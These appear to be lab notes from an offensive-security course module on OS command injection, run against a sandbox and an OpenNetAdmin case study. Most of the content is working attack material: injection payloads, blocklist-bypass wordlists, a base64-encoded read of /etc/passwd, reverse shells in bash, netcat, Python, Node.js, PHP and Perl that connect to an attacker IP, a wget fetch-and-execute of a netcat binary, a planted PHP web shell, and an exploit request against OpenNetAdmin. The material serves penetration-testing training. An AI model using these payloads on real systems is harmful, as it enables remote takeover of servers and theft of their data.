Module 13: Command Injection

PreviousModule 12: Server-side Template Injection - Discovery and Exploitation NextModule 14: Server-side Request Forgery

Last updated 5 months ago

Module 13: Command Injection

Discovery of Command Injection

Accessing the Command Injection Sandbox

Start the VPN, the VM, and add IP to hosts.

Familiarizing Ourselves with the Sandbox

First command injection payload

http://ci-sandbox:80/python/index.py?ip=127.0.0.1|id

Where is Command Injection Most Common?

Vulnerable Code Snippet

<?php
$IP = $_GET['IP'];

echo "<pre>";
system("ping -c 5 ".$IP);
echo "</pre>";
?>

About the Chaining of Commands & System Calls

Executing a single command

kali@kali:~$ ls -ls  
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos

Chaining our first commands

kali@kali:~$ ls -ls ; id
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos

uid=1000(kali) gid=1000(kali) groups=1000(kali),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),120(wireshark),134(scanner),142(kaboxer)

In addition to the semicolon, which allows us to chain multiple commands together in one statement, another unique separator for Linux is the newline (\n), which exists in every HTTP request. Its hexadecimal value is 0x0A.

Chaining with Logical AND (Success)

kali@kali:~$ whoami && hostname
kali
kali

Chaining with Logical AND (Failure)

kali@kali:~$ foobar && hostname
foobar: command not found

Chaining with Logical OR (Failure)

kali@kali:~$ whoami || id      
kali

Chaining with Logical OR (Success)

kali@kali:~$ foobar || whoami  
foobar: command not found
kali

Inline Execution Characters

`cmd`
$(cmd)

Chaining with inline execution

kali@kali:~$ echo "This is an echo statement"
This is an echo statement

kali@kali:~$ echo "This is an `whoami` echo statement"
This is an kali echo statement

kali@kali:~$ echo "This is an $(whoami) echo statement"
This is an kali echo statement

Dealing with Common Protections

Typical Input Normalization - Sending Clean Payloads

Starting a Netcat Listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Our Wrapped Payload with No URL Encoding

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'

Our Encoded Payload result

bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'

Our Wrapped Payload with URL Encoding (ready to be sent)

kali@kali:~$ curl "http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'"

The above could have just been sent in Burp Suite's Repeater after URL-encoding the request...

Receiving a root privileged shell

...
listening on [any] 9090 ...
connect to [172.16.80.2] from (UNKNOWN) [172.16.80.1] 59993
bash: cannot set terminal process group (19): Inappropriate ioctl for device
bash: no job control in this shell
root@cdee2640ffbf:/#

Typical Input Sanitization - Blocklisted Strings Bypass

A Null Statement Injection Bypass can be inserted between any characters of our choosing.

This technique also works for more complex payloads like "nc -nlvp 9090", which becomes: n$()c -n$()lvp 9090

Null Statement Injection into our previous command injection

kali@kali:~$ wh$()oami
kali

A short wordlist to work with wfuzz

bogus
;id
|id
`id`
i$()d
;i$()d
|i$()d
FAIL||i$()d
&&id
&id
FAIL_INTENT|id
FAIL_INTENT||id
`sleep 5`
`sleep 10`
`id`
$(sleep 5)
$(sleep 10)
$(id)
;`echo 'aWQK' |base64 -d`
FAIL_INTENT|`echo 'aWQK' |base64 -d`
FAIL_INTENT||`echo 'aWQK' |base64 -d`

Fuzzing with our Custom Wordlist

kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000003:   200        68 L     124 W      1156 Ch     "|id"
000000015:   200        68 L     124 W      1156 Ch     "`id`"
000000018:   200        68 L     124 W      1156 Ch     "$(id)"
000000001:   200        68 L     117 W      1113 Ch     "bogus"
000000012:   200        68 L     124 W      1156 Ch     "FAIL_INTENT||id"
000000011:   200        68 L     124 W      1156 Ch     "FAIL_INTENT|id"
000000008:   200        69 L     120 W      1167 Ch     "FAIL||i$()d"
000000005:   200        68 L     117 W      1113 Ch     "i$()d"
000000002:   200        68 L     124 W      1156 Ch     ";id"
000000017:   200        68 L     124 W      1156 Ch     "$(sleep 10)"
000000014:   200        68 L     124 W      1156 Ch     "`sleep 10`"
000000004:   200        68 L     124 W      1156 Ch     "`id`"
000000020:   200        69 L     120 W      1167 Ch     "FAIL_INTENT|`echo 'aWQK' |base64 -d`"
000000021:   200        69 L     120 W      1167 Ch     "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000016:   200        68 L     124 W      1156 Ch     "$(sleep 5)"
000000013:   200        68 L     124 W      1156 Ch     "`sleep 5`"
000000007:   200        69 L     120 W      1167 Ch     "|i$()d"
000000019:   200        79 L     187 W      1647 Ch     ";`echo 'aWQK' |base64 -d`"
000000009:   200        78 L     184 W      1593 Ch     "&&id"
000000006:   200        79 L     187 W      1647 Ch     ";i$()d"
000000010:   200        78 L     184 W      1593 Ch     "&id"

Total time: 0
Processed Requests: 21
Filtered Requests: 0
Requests/sec.: 0

Fuzzing with our Custom Wordlist and a Suppressed Response-Size of 1156 bytes

kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 --hh 1156 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                 
=====================================================================
000000001:   200        68 L     117 W      1113 Ch     "bogus"                                       
000000005:   200        68 L     117 W      1113 Ch     "i$()d"                                 
000000008:   200        69 L     120 W      1167 Ch     "FAIL||i$()d"        
000000020:   200        69 L     120 W      1167 Ch     "FAIL_INTENT|`echo 'aWQK' |base64 -d`"       
000000021:   200        69 L     120 W      1167 Ch     "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000010:   200        78 L     184 W      1593 Ch     "&id"                                        
000000009:   200        78 L     184 W      1593 Ch     "&&id"                                      
000000007:   200        69 L     120 W      1167 Ch     "|i$()d"                                      
000000006:   200        79 L     187 W      1647 Ch     ";i$()d"                  
000000019:   200        79 L     187 W      1647 Ch     ";`echo 'aWQK' |base64 -d`"

Total time: 0
Processed Requests: 21
Filtered Requests: 11
Requests/sec.: 0

Encoding our payload with Base64

kali@kali:~$ echo "cat /etc/passwd" |base64
Y2F0IC9ldGMvcGFzc3dkCg==

Our Full and Complete Payload

http://ci-sandbox/php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

Blind OS Command Injection Bypass

Attempting to execute the `id`command with blind command injection

http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;id

Capturing the initial time

kali@kali:~$ time curl http://ci-sandbox:80/php/blind.php?ip=127.0.0.1
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
  background-color: #121212;
}
.check{
  background-color: #1f1f1f;
  border-radius: 4px;
  padding-top: 34px;
  width: 600px;
  height: 150px;
  align-self: center;
  box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
  color: #00ff4c;
}

.offline{
  color: #ff0000;
}

.noParam{
  color: #FFFFFF;
}

</style>
</head>
<body>


<center>
<div class="check" align="center">
        <pre>
        <h3 class='offline'>[ - ] Host is DOWN </h3>        </pre>
</div>
  <img src="logo.png"/>
</center>

</body>
</html>

real 0m10.014s

Bypassing blind sanitization wtih sleep for execution verification

kali@kali:~$ time curl "http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;sleep%2020"
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
  background-color: #121212;
}
.check{
  background-color: #1f1f1f;
  border-radius: 4px;
  padding-top: 34px;
  width: 600px;
  height: 150px;
  align-self: center;
  box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
  color: #00ff4c;
}

.offline{
  color: #ff0000;
}

.noParam{
  color: #FFFFFF;
}

</style>
</head>
<body>


<center>
<div class="check" align="center">
        <pre>
        <h3 class='offline'>[ - ] Host is DOWN </h3>        </pre>
</div>
  <img src="logo.png"/>
</center>

</body>
</html>

real	0m30.002s

Extra Mile

Do the lab.

Enumeration and Exploitation

Enumerating Command Injection Capabilities

Common Linux Capability Checks

Command

Used For

wget

File Transfer

curl

File Transfer

fetch

File Transfer

gcc

Compilation

Shells, File Transfer, Port Forwarding

socat

Shells, File Transfer, Port Forwarding

ping

Networking, Code Execution Verification

netstat

Networking

ifconfig

Networking

hostname

Networking

php

Shells, Code Execution

python

Shells, Code Execution

python3

Shells, Code Execution

perl

Shells, Code Execution

java

Shells, Code Execution

Common Windows Capability Checks

Capability

Used For

Powershell

Code Execution, Enumeration, Movement, Payload Delivery

Visual Basic

Code Execution, Enumeration, Movement, Payload Delivery

tftp

File Transfer

ftp

File Transfer

certutil

File Transfer

Python

Code Execution, Enumeration

.NET

Code Execution, Privilege Escalation, Payload Delivery

ipconfig

Networking

netstat

Networking

hostname

Networking

systeminfo

System Information, Patches, Versioning, Arch, etc.

Custom Linux Capability Wordlist

w00tw00t
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat  
ss
ifconfig
ip
hostname
php
python
python3
perl
java

Fuzzing and checking for capabilities with our Custom Wordlist

kali@kali:~$ wfuzz -c -z file,/home/kali/capability_checks_custom.txt --hc 404 "http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which FUZZ"

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which%20FUZZ
Total requests: 19

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000006:   200        11 L     69 W       503 Ch      "cc"
000000015:   200        11 L     69 W       510 Ch      "php"
000000018:   200        11 L     69 W       505 Ch      "perl"
000000017:   200        11 L     69 W       508 Ch      "python3"
000000001:   200        10 L     68 W       491 Ch      "w00tw00t"
000000014:   200        11 L     69 W       506 Ch      "hostname"
000000019:   200        10 L     68 W       491 Ch      "java"
000000007:   200        11 L     69 W       499 Ch      "nc"
000000016:   200        11 L     69 W       508 Ch      "python"
000000003:   200        11 L     69 W       505 Ch      "curl"
000000012:   200        11 L     69 W       506 Ch      "ifconfig"
000000011:   200        10 L     68 W       491 Ch      "ss"
000000010:   200        11 L     69 W       504 Ch      "netstat"
000000013:   200        10 L     68 W       491 Ch      "ip"
000000009:   200        11 L     69 W       502 Ch      "ping"
000000004:   200        10 L     68 W       492 Ch      "fetch"
000000005:   200        11 L     69 W       505 Ch      "gcc"
000000008:   200        10 L     68 W       492 Ch      "socat"
000000002:   200        11 L     69 W       506 Ch      "wget"

Total time: 0
Processed Requests: 19
Filtered Requests: 0
Requests/sec.: 0

Enumerated capabilities

cc
gcc
php
perl
python
python3
hostname
nc
netstat
curl
wget
ping
ifconfig

We highly recommend taking note of the various options available when attempting to gain a reverse shell. PayloadAllTheThings is an excellent resource to learn about these.

Obtaining a Shell - Netcat

Starting a Netcat listener

nc -nlvp 9090

Endpoin for our command injection

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|/bin/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bash

A root shell with netcat

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51321
whoami
root

Some versions of Netcat don't have the "-e" option; however, the Netcat binary on Kali Linux has no such restriction.

Obtaining a Shell - Python

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Unfolded Python Payload

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.49.51",9090))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);'

Starting a Netcat Listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Full endpoint with payload in the command injection sandbox

http://ci-sandbox/php/index.php?ip=127.0.0.1;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.51%22,9090));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51809
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$

Obtaining a Shell - Node.js

Chained Node.js Reverse Shell

echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

The Full Command Injection Endpoint

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

The full URL-encoded command injection endpoint

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo%20%22require(%27child_process%27).exec(%27nc%20-nv%20192.168.49.51%209090%20-e%20%2Fbin%2Fbash%27)%22%20%3E%20%2Fvar%2Ftmp%2Foffsec.js%20%3B%20node%20%2Fvar%2Ftmp%2Foffsec.js

Starting a Netcat listener on port 9090

kali@kali:!$ nc -nlvp 9090
listening on [any] 9090 ...

Receiving our reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 52319
whoami
root

As additional practice, take note of additional Node payload options available from PayloadAllTheThings.

Obtaining a Shell - PHP

PHP Reverse Shell Examples

php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

The first half of our PHP Payloads

php -r '$sock=fsockopen("192.168.49.51",9090);

Various PHP Execution Options

exec("/bin/sh -i <&3 >&3 2>&3");'
shell_exec("/bin/sh -i <&3 >&3 2>&3");'
system("/bin/sh -i <&3 >&3 2>&3");'
passthru("/bin/sh -i <&3 >&3 2>&3");'
popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Finding a live system with phpinfo() is rare but not unheard of. It contains a wealth of information and is sometimes left behind by system administrators or web developers.

Starting a netcat listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Not encoded endpoing (including our payload)

http://ci-sandbox/php/index.php?ip=127.0.0.1;php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");"

Complete endpoint (including our payload)

http://ci-sandbox/php/index.php?ip=127.0.0.1;php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.51%2F9090%200%3E%261%27%5C%22)%3B%22

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53017
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@5bce60aa9510:/var/www/html/php$

Obtaining a Shell - Perl

Perl Reverse Shell

perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Reverse Shell Unfolded

use Socket;
$i="192.168.49.51";
$p=9090;

socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))) {
     open(STDIN,">&S");
     open(STDOUT,">&S");
     open(STDERR,">&S");
     exec("/bin/sh -i");
}

Full URL Encoded Endpoint

http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.49.51%22%3B%24p%3D9090%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27

Starting a netcat listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53590
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#

File Transfer

Placing the nc binary in our Apache2 web root

kali@kali:~$ sudo cp /bin/nc /var/www/html/
[sudo] password for kali:

kali@kali:~$

Starting the Apache2 Service

kali@kali:~$ sudo service apache2 start

The full payload (unencoded)

wget http://192.168.49.51:80/nc -O /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bash

The full payload (encoded)

wget%20http://192.168.49.51:80/nc%20-O%20/var/tmp/nc%20;%20chmod%20755%20/var/tmp/nc%20;%20/var/tmp/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bash

Starting a netcat listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 60052     
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Extra Mile I

Transfer a different payload, permit the payload, and change the file permissions to execute it for a reverse shell.

Writing a Web Shell

Finding our present working directory

http://ci-sandbox:80/php/index.php?ip=127.0.0.1;pwd

Using echo to write out our own webshell

echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.php

Writing our own webshell

http://ci-sandbox:80/php/index.php?ip=127.0.0.1;echo+%22%3Cpre%3E%3C?php+passthru(\$_GET[%27cmd%27]);+?%3E%3C/pre%3E%22+%3E+/var/www/html/webshell.php

This limitation of web shells is why we always try to leverage them to acquire a full reverse shell.

Extra Mile II

What are the three world writable directories (permissions of 777 or rwx) with which we can write to, execute from, and read from in Linux Operating Systems? It's useful to know these if we ever need to write out to the file system.

/tmp/
/var/tmp/
/dev/shm/

Case Study - OpenNetAdmin (ONA)

Accessing OpenNetAdmin

Start the VPN, VM, and add the IP to your hosts file.

Discovery and Assessment

More often than not, if an exploit requires authentication, a low-privileged user (or even a guest user) will suffice for successful exploitation.

Exploitation

Full POST Data Payload attempting command injection

xajax=window_submit&xajaxr=1632763728103&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E172.24.0.2;id&xajaxargs[]=ping

PreviousModule 12: Server-side Template Injection - Discovery and Exploitation NextModule 14: Server-side Request Forgery

Last updated 5 months ago